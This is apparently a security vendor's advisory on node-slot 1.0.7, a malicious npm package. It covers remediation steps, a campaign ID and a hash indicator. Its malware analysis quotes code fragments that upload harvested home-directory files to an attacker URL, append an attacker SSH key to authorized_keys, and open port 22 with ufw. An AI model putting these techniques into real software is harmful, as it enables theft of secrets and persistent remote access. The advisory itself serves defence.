Which versions of node-slot are malicious?

The following npm versions of node-slot are flagged malicious: 1.0.7. Treat any of these as compromised.

How do I remediate node-slot if I installed it?

Remove node-slot from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is node-slot part of a known attack campaign?

Yes — node-slot is associated with the IN-MAL-2026-007056 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect node-slot in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking node-slot and packages like it before any post-install script runs.

Malicious package

node-slotnpm

Malicious code in node-slot (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6191

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall node-slot

What this malware does

node-slot 1.0.7 contacts https://datasecure-service.vercel.app/api/v1 to retrieve scan and block patterns, then walks the user's home directory (or non-C: drives on Windows) for files matching extensions such as.env,.json,.toml,.pdf,.docx and uploads them via multipart POST (axios.post(UPLOAD_URL, form,...) at index.js:78) along with the OS username and platform. On Linux it additionally fetches an attacker-supplied SSH public key from /api/ssh-key and appends it to ~/.ssh/authorized_keys (fs.appendFileSync(authKeys, sshKey + "\n", { mode: 0o600 })), then runs sudo ufw enable and sudo ufw allow 22/tcp to ensure the operator can reach the SSH service — granting persistent remote shell access to the installer's machine. Server-controlled scan/block patterns let the operator retarget the harvester without republishing. package.json has empty author/description and lists Node built-in names (child_process, os) as fake dependencies — disguise consistent with a deliberately malicious package.

Malicious versions

1 flagged

1.0.7

Indicators of compromise (SHA-256)

91f23a964fca4e1984aecce2dbc51fc6bfa1ffe77725ee5f0e8d2f7a5c5514d8

Frequently asked questions

No. node-slot on npm has been identified as a malicious package (version 1.0.7 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007056

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection